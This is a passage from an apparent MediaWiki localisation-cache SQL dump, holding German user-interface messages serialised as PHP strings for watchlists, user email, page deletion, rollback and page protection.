Benutzer\";'),('de','messages:protectedtitles','s:23:\"Geschützte Seitennamen\";'),('de','messages:protectedtitles-summary','s:194:\"Diese Seite listet Titel auf, die derzeit vor der Erstellung geschützt sind. Für eine Liste vorhandener geschützter Seiten, siehe „[[{{#special:ProtectedPages}}|{{int:protectedpages}}]]“.\";'),('de','messages:protectedtitlesempty','s:84:\"Zurzeit sind mit den angegebenen Parametern keine Seiten zur Neuerstellung gesperrt.\";'),('de','messages:listusers','s:19:\"Benutzerverzeichnis\";'),('de','messages:listusers-editsonly','s:33:\"Zeige nur Benutzer mit Beiträgen\";'),('de','messages:listusers-creationsort','s:27:\"Nach Erstelldatum sortieren\";'),('de','messages:listusers-desc','s:37:\"In absteigender Reihenfolge sortieren\";'),('de','messages:usereditcount','s:42:\"$1 {{PLURAL:$1|Bearbeitung|Bearbeitungen}}\";'),('de','messages:usercreated','s:38:\"{{GENDER:$3|Erstellt}} am $1 um $2 Uhr\";'),('de','messages:newpages','s:11:\"Neue Seiten\";'),('de','messages:newpages-username','s:13:\"Benutzername:\";'),('de','messages:ancientpages','s:35:\"Seit längerem unbearbeitete Seiten\";'),('de','messages:move','s:11:\"Verschieben\";'),('de','messages:movethispage','s:17:\"Seite verschieben\";'),('de','messages:unusedimagestext','s:168:\"Bitte beachte, dass andere Webseiten eine Datei mit einer direkten URL verlinken können. Sie könnte daher hier aufgelistet sein, obwohl sie in aktiver Verwendung ist.\";'),('de','messages:unusedcategoriestext','s:108:\"Diese Spezialseite zeigt alle Kategorien, die leer sind, also selbst keine Kategorien oder Seiten enthalten.\";'),('de','messages:notargettitle','s:21:\"Keine Seite angegeben\";'),('de','messages:notargettext','s:80:\"Du hast nicht angegeben, auf welche Seite diese Funktion angewendet werden soll.\";'),('de','messages:nopagetitle','s:21:\"Seite nicht vorhanden\";'),('de','messages:nopagetext','s:41:\"Die angegebene Seite ist nicht vorhanden.\";'),('de','messages:pager-newer-n','s:35:\"{{PLURAL:$1|nächster|nächste $1}}\";'),('de','messages:pager-older-n','s:37:\"{{PLURAL:$1|vorheriger|vorherige $1}}\";'),('de','messages:suppress','s:9:\"Oversight\";'),('de','messages:querypage-disabled','s:73:\"Diese Spezialseite wurde aus Gründen der Leistungserhaltung deaktiviert.\";'),('de','messages:booksources','s:10:\"ISBN-Suche\";'),('de','messages:booksources-search-legend','s:37:\"Suche nach Bezugsquellen für Bücher\";'),('de','messages:booksources-go','s:6:\"Suchen\";'),('de','messages:booksources-text','s:225:\"Dies ist eine Liste mit Links zu Internetseiten, die neue und gebrauchte Bücher verkaufen. Dort kann es auch weitere Informationen über die Bücher geben. {{SITENAME}} ist mit keinem dieser Anbieter geschäftlich verbunden.\";'),('de','messages:booksources-invalid-isbn','s:97:\"Vermutlich ist die ISBN ungültig.\nBitte prüfe, ob sie korrekt von der Quelle übertragen wurde.\";'),('de','messages:specialloguserlabel','s:23:\"Ausführender Benutzer:\";'),('de','messages:speciallogtitlelabel','s:27:\"Ziel (Titel oder Benutzer):\";'),('de','messages:log','s:10:\"Logbücher\";'),('de','messages:all-logs-page','s:29:\"Alle öffentlichen Logbücher\";'),('de','messages:alllogstext','s:234:\"Dies ist die kombinierte Anzeige aller in {{SITENAME}} geführten Logbücher.\nDie Ausgabe kann durch die Auswahl des Logbuchtyps, des Benutzers oder des Seitentitels eingeschränkt werden (Groß-/Kleinschreibung muss beachtet werden).\";'),('de','messages:logempty','s:26:\"Keine passenden Einträge.\";'),('de','messages:log-title-wildcard','s:21:\"Titel beginnt mit …\";'),('de','messages:showhideselectedlogentries','s:49:\"Ausgewählte Logbucheinträge anzeigen/verstecken\";'),('de','messages:allpages','s:11:\"Alle Seiten\";'),('de','messages:nextpage','s:19:\"Nächste Seite ($1)\";'),('de','messages:prevpage','s:20:\"Vorherige Seite ($1)\";'),('de','messages:allpagesfrom','s:19:\"Seiten anzeigen ab:\";'),('de','messages:allpagesto','s:20:\"Seiten anzeigen bis:\";'),('de','messages:allarticles','s:11:\"Alle Seiten\";'),('de','messages:allinnamespace','s:28:\"Alle Seiten (Namensraum: $1)\";'),('de','messages:allpagessubmit','s:8:\"Anwenden\";'),('de','messages:allpagesprefix','s:28:\"Seiten anzeigen mit Präfix:\";'),('de','messages:allpagesbadtitle','s:202:\"Der eingegebene Seitenname ist ungültig: Er hat entweder ein vorangestelltes Sprach-, ein Interwiki-Kürzel oder enthält ein oder mehrere Zeichen, welche in Seitennamen nicht verwendet werden dürfen.\";'),('de','messages:allpages-bad-ns','s:60:\"Der Namensraum „$1“ ist in {{SITENAME}} nicht vorhanden.\";'),('de','messages:allpages-hide-redirects','s:26:\"Weiterleitungen ausblenden\";'),('de','messages:cachedspecial-viewing-cached-ttl','s:73:\"Du siehst die gecachte Version dieser Seite, die bis zu $1 alt sein kann.\";'),('de','messages:cachedspecial-viewing-cached-ts','s:83:\"Du siehst die gecachte Version dieser Seite, die möglicherweise nicht aktuell ist.\";'),('de','messages:cachedspecial-refresh-now','s:25:\"Aktuelle Version ansehen.\";'),('de','messages:categories','s:10:\"Kategorien\";'),('de','messages:categoriespagetext','s:243:\"Folgende {{PLURAL:$1|Kategorie enthält|Kategorien enthalten}} Seiten oder Dateien.\n[[Special:UnusedCategories|Verwaiste Kategorien]] werden hier nicht aufgeführt.\nSiehe auch die Liste der [[Special:WantedCategories|gewünschten Kategorien]].\";'),('de','messages:categoriesfrom','s:20:\"Zeige Kategorien ab:\";'),('de','messages:special-categories-sort-count','s:22:\"Sortierung nach Anzahl\";'),('de','messages:special-categories-sort-abc','s:24:\"Sortierung nach Alphabet\";'),('de','messages:deletedcontributions','s:20:\"Gelöschte Beiträge\";'),('de','messages:deletedcontributions-title','s:20:\"Gelöschte Beiträge\";'),('de','messages:sp-deletedcontributions-contribs','s:17:\"Benutzerbeiträge\";'),('de','messages:linksearch','s:12:\"Weblinksuche\";'),('de','messages:linksearch-pat','s:11:\"Suchmuster:\";'),('de','messages:linksearch-ns','s:11:\"Namensraum:\";'),('de','messages:linksearch-ok','s:6:\"Suchen\";'),('de','messages:linksearch-text','s:408:\"Diese Spezialseite ermöglicht die Suche nach Seiten, in denen bestimmte Weblinks enthalten sind. Dabei können Platzhalter wie beispielsweise *.beispiel.de benutzt werden. Es muss mindestens eine Top-Level-Domain, z. B. „*.org“. angegeben werden.
                                                                {{PLURAL:$2|Unterstütztes Protokoll|Unterstützte Protokolle}}: $1 (Standard ist http, falls kein Protokoll angegeben ist.)\";'),('de','messages:linksearch-line','s:22:\"$1 ist verlinkt von $2\";'),('de','messages:linksearch-error','s:57:\"Wildcards können nur am Anfang der URL verwendet werden.\";'),('de','messages:listusersfrom','s:18:\"Zeige Benutzer ab:\";'),('de','messages:listusers-submit','s:5:\"Zeige\";'),('de','messages:listusers-noresult','s:25:\"Keinen Benutzer gefunden.\";'),('de','messages:listusers-blocked','s:10:\"(gesperrt)\";'),('de','messages:activeusers','s:15:\"Aktive Benutzer\";'),('de','messages:activeusers-intro','s:124:\"Dies ist eine Liste von Benutzern, die innerhalb {{PLURAL:$1|des letzten Tages|der letzten $1 Tage}} Aktivitäten aufwiesen.\";'),('de','messages:activeusers-count','s:93:\"$1 {{PLURAL:$1|Aktion|Aktionen}} in den {{PLURAL:$3|letzten 24 Stunden|vergangenen $3 Tagen}}\";'),('de','messages:activeusers-from','s:18:\"Zeige Benutzer ab:\";'),('de','messages:activeusers-hidebots','s:15:\"Bots ausblenden\";'),('de','messages:activeusers-hidesysops','s:26:\"Administratoren ausblenden\";'),('de','messages:activeusers-noresult','s:24:\"Keine Benutzer gefunden.\";'),('de','messages:listgrouprights','s:21:\"Benutzergruppenrechte\";'),('de','messages:listgrouprights-summary','s:222:\"Dies ist eine Liste der in diesem Wiki definierten Benutzergruppen und der damit verbundenen Rechte.\nZusätzliche Informationen über einzelne Rechte können [[{{MediaWiki:Listgrouprights-helppage}}|hier]] gefunden werden.\";'),('de','messages:listgrouprights-key','s:136:\"Legende:\n* Gewährtes Recht\n* Entzogenes Recht\";'),('de','messages:listgrouprights-group','s:6:\"Gruppe\";'),('de','messages:listgrouprights-rights','s:6:\"Rechte\";'),('de','messages:listgrouprights-helppage','s:18:\"Help:Gruppenrechte\";'),('de','messages:listgrouprights-members','s:17:\"(Mitgliederliste)\";'),('de','messages:listgrouprights-addgroup','s:70:\"Benutzer zu {{PLURAL:$2|dieser Gruppe|diesen Gruppen}} hinzufügen: $1\";'),('de','messages:listgrouprights-removegroup','s:69:\"Benutzer aus {{PLURAL:$2|dieser Gruppe|diesen Gruppen}} entfernen: $1\";'),('de','messages:listgrouprights-addgroup-all','s:37:\"Benutzer zu allen Gruppen hinzufügen\";'),('de','messages:listgrouprights-removegroup-all','s:36:\"Benutzer aus allen Gruppen entfernen\";'),('de','messages:listgrouprights-addgroup-self','s:83:\"Eigenes Benutzerkonto zu {{PLURAL:$2|dieser Gruppe|diesen Gruppen}} hinzufügen: $1\";'),('de','messages:listgrouprights-removegroup-self','s:82:\"Eigenes Benutzerkonto aus {{PLURAL:$2|dieser Gruppe|diesen Gruppen}} entfernen: $1\";'),('de','messages:listgrouprights-addgroup-self-all','s:47:\"Kann alle Gruppen zum eigenen Konto hinzufügen\";'),('de','messages:listgrouprights-removegroup-self-all','s:45:\"Kann alle Gruppen vom eigenen Konto entfernen\";'),('de','messages:listgrouprights-namespaceprotection-header','s:25:\"Namensraumbeschränkungen\";'),('de','messages:listgrouprights-namespaceprotection-namespace','s:10:\"Namensraum\";'),('de','messages:listgrouprights-namespaceprotection-restrictedto','s:49:\"Rechte, die dem Benutzer die Bearbeitung erlauben\";'),('de','messages:trackingcategories','s:19:\"Tracking-Kategorien\";'),('de','messages:trackingcategories-summary','s:219:\"Diese Seite listet Tracking-Kategorien auf, die von der MediaWiki-Software automatisch eingepflegt werden. Ihre Namen können durch Änderung der entsprechenden Systemnachrichten im {{ns:8}}-Namensraum angepasst werden.\";'),('de','messages:trackingcategories-msg','s:18:\"Tracking-Kategorie\";'),('de','messages:trackingcategories-name','s:18:\"Name der Nachricht\";'),('de','messages:trackingcategories-desc','s:29:\"Kategorieeinbindungskriterien\";'),('de','messages:noindex-category-desc','s:183:\"Die Seite wird nicht von Bots indexiert, da sie das magische Wort __NOINDEX__ enthält und sich in einem Namensraum befindet, wo dieses Flag erlaubt ist.\";'),('de','messages:index-category-desc','s:187:\"Die Seite enthält ein __INDEX__ und befindet sich in einem Namensraum, in dem dieses Flag nicht erlaubt ist und wird daher von Bots ausnahmsweise indexiert.\";'),('de','messages:post-expand-template-inclusion-category-desc','s:151:\"Die Seitengröße ist nach dem Expandieren aller Vorlagen größer als $wgMaxArticleSize, so dass einige Vorlagen nicht expandiert wurden.\";'),('de','messages:post-expand-template-argument-category-desc','s:163:\"Die Seite ist nach dem Expandieren eines Vorlagenargumentes größer als $wgMaxArticleSize (etwas in dreifachen Klammern, wie {{{Foo}}}).\";'),('de','messages:expensive-parserfunction-category-desc','s:205:\"Die Seite verwendet zu viele aufwändige Parserfunktionen (wie #ifexist). Siehe das [https://www.mediawiki.org/wiki/Special:MyLanguage/Manual:$wgExpensiveParserFunctionLimit Benutzerhandbuch].\";'),('de','messages:broken-file-category-desc','s:111:\"Die Seite enthält einen defekten Dateilink (einen Link zu einer eingebetteten Datei, die nicht vorhanden ist).\";'),('de','messages:hidden-category-category-desc','s:180:\"Die Kategorie enthält __HIDDENCAT__ in ihrem Seiteninhalt, was verhindert, dass sie standardmäßig auf Seiten im Kategorielinkkasten angezeigt wird.\";'),('de','messages:trackingcategories-nodesc','s:30:\"Keine Beschreibung verfügbar.\";'),('de','messages:trackingcategories-disabled','s:25:\"Kategorie ist deaktiviert\";'),('de','messages:mailnologin','s:26:\"Fehler beim E-Mail-Versand\";'),('de','messages:mailnologintext','s:199:\"Du musst [[Special:UserLogin|angemeldet sein]] und eine bestätigte E-Mail-Adresse in deinen [[Special:Preferences|Einstellungen]] eingetragen haben, um anderen Benutzern E-Mails schicken zu können.\";'),('de','messages:emailuser','s:25:\"E-Mail an diesen Benutzer\";'),('de','messages:emailuser-title-target','s:63:\"E-Mail an {{GENDER:$1|diesen Benutzer|diese Benutzerin}} senden\";'),('de','messages:emailuser-title-notarget','s:18:\"E-Mail an Benutzer\";'),('de','messages:emailpage','s:18:\"E-Mail an Benutzer\";'),('de','messages:emailpagetext','s:278:\"Du kannst {{GENDER:$1|dem Benutzer|der Benutzerin}} mit dem unten stehenden Formular eine E-Mail senden.\nAls Absender wird die E-Mail-Adresse aus deinen [[Special:Preferences|Einstellungen]] eingetragen, damit {{GENDER:$1|der Benutzer|die Benutzerin}} dir direkt antworten kann.\";'),('de','messages:defemailsubject','s:45:\"{{SITENAME}} – E-Mail von Benutzer „$1“\";'),('de','messages:usermaildisabled','s:26:\"E-Mail-Empfang deaktiviert\";'),('de','messages:usermaildisabledtext','s:64:\"Du kannst in diesem Wiki keine E-Mails an andere Benutzer senden\";'),('de','messages:noemailtitle','s:20:\"Keine E-Mail-Adresse\";'),('de','messages:noemailtext','s:60:\"Dieser Benutzer hat keine gültige E-Mail-Adresse angegeben.\";'),('de','messages:nowikiemailtext','s:69:\"Dieser Benutzer möchte keine E-Mails von anderen Benutzern erhalten.\";'),('de','messages:emailnotarget','s:78:\"Nicht vorhandener oder ungültiger Benutzername für den Empfang einer E-Mail.\";'),('de','messages:emailtarget','s:38:\"Benutzernamen des Empfängers eingeben\";'),('de','messages:emailusername','s:13:\"Benutzername:\";'),('de','messages:emailusernamesubmit','s:6:\"Weiter\";'),('de','messages:email-legend','s:52:\"E-Mail an einen anderen {{SITENAME}}-Benutzer senden\";'),('de','messages:emailfrom','s:4:\"Von:\";'),('de','messages:emailto','s:3:\"An:\";'),('de','messages:emailsubject','s:8:\"Betreff:\";'),('de','messages:emailmessage','s:10:\"Nachricht:\";'),('de','messages:emailsend','s:6:\"Senden\";'),('de','messages:emailccme','s:35:\"Sende eine Kopie der E-Mail an mich\";'),('de','messages:emailccsubject','s:32:\"Kopie deiner Nachricht an $1: $2\";'),('de','messages:emailsent','s:17:\"E-Mail verschickt\";'),('de','messages:emailsenttext','s:30:\"Deine E-Mail wurde verschickt.\";'),('de','messages:emailuserfooter','s:75:\"Diese E-Mail wurde von {{SITENAME}}-Benutzer „$1“ an „$2“ gesendet.\";'),('de','messages:usermessage-summary','s:28:\"Systemnachricht gespeichert.\";'),('de','messages:usermessage-editor','s:16:\"System-Messenger\";'),('de','messages:usermessage-template','s:27:\"MediaWiki:Benutzernachricht\";'),('de','messages:watchlist','s:17:\"Beobachtungsliste\";'),('de','messages:mywatchlist','s:17:\"Beobachtungsliste\";'),('de','messages:watchlistfor2','s:9:\"Von $1 $2\";'),('de','messages:nowatchlist','s:62:\"Es befinden sich keine Einträge auf deiner Beobachtungsliste.\";'),('de','messages:watchlistanontext','s:102:\"Du musst dich anmelden, um deine Beobachtungsliste sehen oder Einträge auf ihr bearbeiten zu können.\";'),('de','messages:watchnologin','s:24:\"Du bist nicht angemeldet\";'),('de','messages:addwatch','s:33:\"Zur Beobachtungsliste hinzufügen\";'),('de','messages:addedwatchtext','s:190:\"Die Seite „[[:$1]]“ wurde zu deiner [[Special:Watchlist|Beobachtungsliste]] hinzugefügt.\nSpätere Änderungen an dieser Seite und der zugehörigen Diskussionsseite werden dort gelistet.\";'),('de','messages:addedwatchtext-short','s:66:\"Die Seite „$1“ wurde zu deiner Beobachtungsliste hinzugefügt.\";'),('de','messages:removewatch','s:35:\"Von der Beobachtungsliste entfernen\";'),('de','messages:removedwatchtext','s:90:\"Die Seite „[[:$1]]“ wurde von deiner [[Special:Watchlist|Beobachtungsliste]] entfernt.\";'),('de','messages:removedwatchtext-short','s:63:\"Die Seite „$1“ wurde von deiner Beobachtungsliste entfernt.\";'),('de','messages:watch','s:10:\"Beobachten\";'),('de','messages:watchthispage','s:16:\"Seite beobachten\";'),('de','messages:unwatch','s:21:\"Nicht mehr beobachten\";'),('de','messages:unwatchthispage','s:21:\"Nicht mehr beobachten\";'),('de','messages:notanarticle','s:11:\"Keine Seite\";'),('de','messages:notvisiblerev','s:23:\"Version wurde gelöscht\";'),('de','messages:watchlist-details','s:104:\"Du beobachtest {{PLURAL:$1|eine Seite|$1 Seiten}}, ohne dass Diskussionsseiten getrennt gezählt werden.\";'),('de','messages:wlheader-enotif','s:49:\"Der E-Mail-Benachrichtigungsdienst ist aktiviert.\";'),('de','messages:wlheader-showupdated','s:74:\"Seiten mit noch nicht gesehenen Änderungen werden \'\'\'fett\'\'\' dargestellt.\";'),('de','messages:wlnote','s:175:\"Es {{PLURAL:$1|folgt die letzte Änderung|folgen die letzten $1 Änderungen}} der letzten {{PLURAL:$2|Stunde|$2 Stunden}}. Stand: $3, $4 Uhr.\";'),('de','messages:wlshowlast','s:62:\"Zeige die Änderungen der letzten $1 Stunden, $2 Tage oder $3.\";'),('de','messages:watchlist-options','s:15:\"Anzeigeoptionen\";'),('de','messages:watching','s:14:\"Beobachten …\";'),('de','messages:unwatching','s:25:\"Nicht mehr beobachten …\";'),('de','messages:watcherrortext','s:90:\"Beim Ändern der Beobachtungslisteneinstellungen für „$1“ ist ein Fehler aufgetreten.\";'),('de','messages:enotif_reset','s:33:\"Alle Seiten als besucht markieren\";'),('de','messages:enotif_impersonal_salutation','s:21:\"{{SITENAME}}-Benutzer\";'),('de','messages:enotif_subject_deleted','s:58:\"{{SITENAME}}-Seite $1 wurde von {{GENDER:$2|$2}} gelöscht\";'),('de','messages:enotif_subject_created','s:57:\"{{SITENAME}}-Seite $1 wurde von {{GENDER:$2|$2}} erstellt\";'),('de','messages:enotif_subject_moved','s:59:\"{{SITENAME}}-Seite $1 wurde von {{GENDER:$2|$2}} verschoben\";'),('de','messages:enotif_subject_restored','s:66:\"{{SITENAME}}-Seite $1 wurde von {{GENDER:$2|$2}} wiederhergestellt\";'),('de','messages:enotif_subject_changed','s:58:\"{{SITENAME}}-Seite $1 wurde von {{GENDER:$2|$2}} geändert\";'),('de','messages:enotif_body_intro_deleted','s:90:\"Die {{SITENAME}}-Seite $1 wurde am $PAGEEDITDATE von {{GENDER:$2|$2}} gelöscht. Siehe $3.\";'),('de','messages:enotif_body_intro_created','s:117:\"Die {{SITENAME}}-Seite $1 wurde am $PAGEEDITDATE von {{GENDER:$2|$2}} erstellt. Siehe $3 für deren aktuelle Version.\";'),('de','messages:enotif_body_intro_moved','s:119:\"Die {{SITENAME}}-Seite $1 wurde am $PAGEEDITDATE von {{GENDER:$2|$2}} verschoben. Siehe $3 für deren aktuelle Version.\";'),('de','messages:enotif_body_intro_restored','s:126:\"Die {{SITENAME}}-Seite $1 wurde am $PAGEEDITDATE von {{GENDER:$2|$2}} wiederhergestellt. Siehe $3 für deren aktuelle Version.\";'),('de','messages:enotif_body_intro_changed','s:118:\"Die {{SITENAME}}-Seite $1 wurde am $PAGEEDITDATE von {{GENDER:$2|$2}} geändert. Siehe $3 für deren aktuelle Version.\";'),('de','messages:enotif_lastvisited','s:36:\"Alle Änderungen auf einen Blick: $1\";'),('de','messages:enotif_lastdiff','s:31:\"Siehe $1 nach dieser Änderung.\";'),('de','messages:enotif_anon_editor','s:20:\"Anonymer Benutzer $1\";'),('de','messages:enotif_body','s:849:\"Hallo $WATCHINGUSERNAME,\n\n$PAGEINTRO $NEWPAGE\n\nZusammenfassung des Bearbeiters: $PAGESUMMARY $PAGEMINOREDIT\n\nKontakt zum Bearbeiter:\nE-Mail: $PAGEEDITOR_EMAIL\nWiki: $PAGEEDITOR_WIKI\n\nBei weiterer Aktivität auf der Seite werden dir so lange keine weiteren Benachrichtigungs-E-Mails gesendet, bis du die Seite wieder angemeldet besucht hast. Auf deiner Beobachtungsliste kannst du alle Benachrichtigungsmarkierungen zusammen zurücksetzen.\n\nDein freundliches {{SITENAME}}-Benachrichtigungssystem\n\n--\nUm die Einstellungen der E-Mail-Benachrichtigung anzupassen, besuche {{canonicalurl:{{#special:Preferences}}}}.\n\nUm die Einstellungen deiner Beobachtungsliste anzupassen, besuche {{canonicalurl:{{#special:EditWatchlist}}}}.\n\nUm die Seite von deiner Beobachtungsliste herunterzunehmen, besuche $UNWATCHURL.\n\nRückmeldungen und weitere Hilfe: $HELPPAGE\";'),('de','messages:created','s:8:\"erstellt\";'),('de','messages:changed','s:9:\"geändert\";'),('de','messages:deletepage','s:14:\"Seite löschen\";'),('de','messages:confirm','s:11:\"Bestätigen\";'),('de','messages:excontent','s:20:\"Inhalt war: „$1“\";'),('de','messages:excontentauthor','s:75:\"Inhalt war: „$1“ (einziger Bearbeiter: [[Special:Contributions/$2|$2]])\";'),('de','messages:exbeforeblank','s:41:\"Inhalt vor dem Leeren der Seite: „$1“\";'),('de','messages:delete-confirm','s:21:\"Löschen von „$1“\";'),('de','messages:delete-legend','s:8:\"Löschen\";'),('de','messages:historywarning','s:137:\"Achtung: Die Seite, die du löschen möchtest, hat eine Versionsgeschichte mit {{PLURAL:$1|einer Version|$1 Versionen}}:\";'),('de','messages:confirmdeletetext','s:237:\"Du bist dabei, eine Seite mit allen zugehörigen älteren Versionen zu löschen. Bitte bestätige dazu, dass du dir der Konsequenzen bewusst bist, und dass du in Übereinstimmung mit den [[{{MediaWiki:Policy-url}}|Richtlinien]] handelst.\";'),('de','messages:actioncomplete','s:14:\"Aktion beendet\";'),('de','messages:actionfailed','s:21:\"Aktion fehlgeschlagen\";'),('de','messages:deletedtext','s:78:\"„$1“ wurde gelöscht. Im $2 findest du eine Liste der letzten Löschungen.\";'),('de','messages:dellogpage','s:14:\"Lösch-Logbuch\";'),('de','messages:dellogpagetext','s:56:\"Dies ist das Logbuch der gelöschten Seiten und Dateien.\";'),('de','messages:deletionlog','s:14:\"Lösch-Logbuch\";'),('de','messages:reverted','s:36:\"Auf eine alte Version zurückgesetzt\";'),('de','messages:deletecomment','s:6:\"Grund:\";'),('de','messages:deleteotherreason','s:27:\"Anderer/ergänzender Grund:\";'),('de','messages:deletereasonotherlist','s:13:\"Anderer Grund\";'),('de','messages:deletereason-dropdown','s:122:\"* Allgemeine Löschgründe\n** Spam\n** Vandalismus\n** Urheberrechtsverletzung\n** Wunsch des Autors\n** Defekte Weiterleitung\";'),('de','messages:delete-edit-reasonlist','s:24:\"Löschgründe bearbeiten\";'),('de','messages:delete-toobig','s:211:\"Diese Seite hat mit mehr als $1 {{PLURAL:$1|Version|Versionen}} eine sehr lange Versionsgeschichte. Das Löschen solcher Seiten wurde eingeschränkt, um eine versehentliche Überlastung der Server zu verhindern.\";'),('de','messages:delete-warning-toobig','s:160:\"Diese Seite hat mit mehr als $1 {{PLURAL:$1|Version|Versionen}} eine sehr lange Versionsgeschichte. Das Löschen kann zu Störungen im Datenbankbetrieb führen.\";'),('de','messages:deleteprotected','s:62:\"Du kannst diese Seite nicht löschen, da sie geschützt wurde.\";'),('de','messages:deleting-backlinks-warning','s:165:\"\'\'\'Warnung:\'\'\' Es verweisen noch [[Special:WhatLinksHere/{{FULLPAGENAME}}|andere Seiten]] auf die zu löschende Seite oder diese Seite ist noch woanders eingebunden.\";'),('de','messages:rollback','s:29:\"Zurücksetzen der Änderungen\";'),('de','messages:rollback_short','s:13:\"Zurücksetzen\";'),('de','messages:rollbacklink','s:13:\"Zurücksetzen\";'),('de','messages:rollbacklinkcount','s:53:\"{{PLURAL:$1|Eine Version|$1 Versionen}} zurücksetzen\";'),('de','messages:rollbacklinkcount-morethan','s:62:\"Mehr als {{PLURAL:$1|eine Version|$1 Versionen}} zurücksetzen\";'),('de','messages:rollbackfailed','s:25:\"Zurücksetzen gescheitert\";'),('de','messages:cantrollback','s:83:\"Die Änderung kann nicht zurückgesetzt werden, da es keine früheren Autoren gibt.\";'),('de','messages:alreadyrolled','s:400:\"Das Zurücksetzen der Änderungen von [[User:$2|$2]] ([[User talk:$2|Diskussion]]{{int:pipe-separator}}[[Special:Contributions/$2|{{int:contribslink}}]]) an [[:$1]] ist gescheitert, da in der Zwischenzeit ein anderer Benutzer die Seite geändert hat.\n\nDie letzte Änderung stammt von [[User:$3|$3]] ([[User talk:$3|Diskussion]]{{int:pipe-separator}}[[Special:Contributions/$3|{{int:contribslink}}]]).\";'),('de','messages:editcomment','s:51:\"Die Änderungszusammenfassung lautet: \'\'„$1“\'\'.\";'),('de','messages:revertpage','s:141:\"Änderungen von [[Special:Contributions/$2|$2]] ([[User talk:$2|Diskussion]]) wurden auf die letzte Version von [[User:$1|$1]] zurückgesetzt\";'),('de','messages:revertpage-nouser','s:133:\"Änderungen von einem versteckten Benutzer rückgängig gemacht und letzte Version von {{GENDER:$1|[[User:$1|$1]]}} wiederhergestellt\";'),('de','messages:rollback-success','s:105:\"Die Änderungen von $1 wurden rückgängig gemacht und die letzte Version von $2 wurde wiederhergestellt.\";'),('de','messages:sessionfailure-title','s:14:\"Sitzungsfehler\";'),('de','messages:sessionfailure','s:307:\"Es gab ein Problem bei der Übertragung deiner Benutzerdaten.\nDiese Aktion wurde daher sicherheitshalber abgebrochen, um eine falsche Zuordnung deiner Änderungen zu einem anderen Benutzer zu verhindern.\nBitte gehe zurück zur vorherigen Seite, lade sie erneut und versuche, den Vorgang erneut auszuführen.\";'),('de','messages:protectlogpage','s:20:\"Seitenschutz-Logbuch\";'),('de','messages:protectlogtext','s:140:\"Dies ist das Seitenschutz-Logbuch.\nSiehe die [[Special:ProtectedPages|Liste der geschützten Seiten]] für alle aktuell geschützten Seiten.\";'),('de','messages:protectedarticle','s:22:\"schützte „[[$1]]“\";'),('de','messages:modifiedarticleprotection','s:36:\"änderte den Schutz von „[[$1]]“\";'),('de','messages:unprotectedarticle','s:35:\"hob den Schutz von „[[$1]]“ auf\";'),('de','messages:movedarticleprotection','s:60:\"übertrug den Seitenschutz von „[[$2]]“ auf „[[$1]]“\";'),('de','messages:protect-title','s:27:\"Schutz ändern von „$1“\";'),('de','messages:protect-title-notallowed','s:27:\"Schutz ansehen von „$1“\";'),('de','messages:prot_1movedto2','s:45:\"hat „[[$1]]“ nach „[[$2]]“ verschoben\";'),('de','messages:protect-badnamespace-title','s:29:\"Nicht-schützbarer Namensraum\";'),('de','messages:protect-badnamespace-text','s:58:\"Seiten dieses Namensraums können nicht geschützt werden.\";'),('de','messages:protect-norestrictiontypes-text','s:87:\"Diese Seite kann nicht geschützt werden, da keine Beschränkungstypen verfügbar sind.\";'),('de','messages:protect-norestrictiontypes-title','s:23:\"Nicht schützbare Seite\";'),('de','messages:protect-legend','s:26:\"Seitenschutzstatus ändern\";'),('de','messages:protectcomment','s:6:\"Grund:\";'),('de','messages:protectexpiry','s:11:\"Sperrdauer:\";'),('de','messages:protect_expiry_invalid','s:36:\"Die eingegebene Dauer ist ungültig.\";'),('de','messages:protect_expiry_old','s:41:\"Die Sperrzeit liegt in der Vergangenheit.\";'),('de','messages:protect-unchain-permissions','s:33:\"Separate Sperroptionen aktivieren\";'),('de','messages:protect-text','s:72:\"Hier kannst du den Schutzstatus der Seite „$1“ einsehen und ändern.\";'),('de','messages:protect-locked-blocked','s:154:\"Du kannst den Seitenschutz nicht ändern, da dein Benutzerkonto gesperrt ist. Hier sind die aktuellen Seitenschutz-Einstellungen der Seite \'\'\'„$1“:\'\'\'\";'),('de','messages:protect-locked-dblock','s:156:\"Die Datenbank ist gesperrt, der Seitenschutz kann daher nicht geändert werden. Hier sind die aktuellen Seitenschutz-Einstellungen der Seite \'\'\'„$1“:\'\'\'\";'),('de','messages:protect-locked-access','s:172:\"Dein Benutzerkonto verfügt nicht über die notwendigen Rechte zur Änderung des Seitenschutzes. Hier sind die aktuellen Seitenschutzeinstellungen der Seite \'\'\'„$1“:\'\'\'\";'),('de','messages:protect-cascadeon','s:281:\"Diese Seite ist gegenwärtig Teil einer Kaskadensperre. Sie ist in die {{PLURAL:$1|folgende Seite|folgenden Seiten}} eingebunden, welche durch die Kaskadensperroption geschützt {{PLURAL:$1|ist|sind}}.\nÄnderungen am Seitenschutzstatus haben keinen Einfluss auf die Kaskadensperre:\";'),('de','messages:protect-default','s:13:\"Alle Benutzer\";'),('de','messages:protect-fallback','s:53:\"Nur Benutzern mit der „$1“-Berechtigung erlauben.\";'),('de','messages:protect-level-autoconfirmed','s:47:\"Nur automatisch bestätigten Benutzern erlauben\";'),('de','messages:protect-level-sysop','s:28:\"Nur Administratoren erlauben\";'),('de','messages:protect-summary-cascade','s:12:\"kaskadierend\";'),('de','messages:protect-expiring','s:20:\"bis $2, $3 Uhr (UTC)\";'),('de','messages:protect-expiring-local','s:6:\"bis $1\";'),('de','messages:protect-expiry-indefinite','s:13:\"unbeschränkt\";'),('de','messages:protect-cascade','s:94:\"Kaskadierende Sperre – alle in diese Seite eingebundenen Vorlagen werden ebenfalls gesperrt.\";'),('de','messages:protect-cantedit','s:104:\"Du kannst die Sperre dieser Seite nicht ändern, da du keine Berechtigung zum Bearbeiten der Seite hast.\";'),('de','messages:protect-othertime','s:18:\"Andere Sperrdauer:\";'),('de','messages:protect-othertime-op','s:17:\"andere Sperrdauer\";'),('de','messages:protect-existing-expiry','s:38:\"Aktuelles Seitenschutzende: $2, $3 Uhr\";'),('de','messages:protect-existing-expiry-infinity','s:36:\"Vorhandene Ablaufzeit: unbeschränkt\";'),('de','messages:protect-otherreason','s:27:\"Anderer/ergänzender Grund:\";'),('de','messages:protect-otherreason-op','s:13:\"Anderer Grund\";'),('de','messages:protect-dropdown','s:172:\"* Allgemeine Schutzgründe\n** Edit-War\n** Wiederkehrender Vandalismus\n** Wiederholtes Einstellen von Werbung\n** Häufig eingebundene Vorlage\n** Seite mit hoher Besucherzahl\";'),('de','messages:protect-edit-reasonlist','s:24:\"Schutzgründe bearbeiten\";'),('de','messages:protect-expiry-options','s:148:\"1 Stunde:1 hour,1 Tag:1 day,1 Woche:1 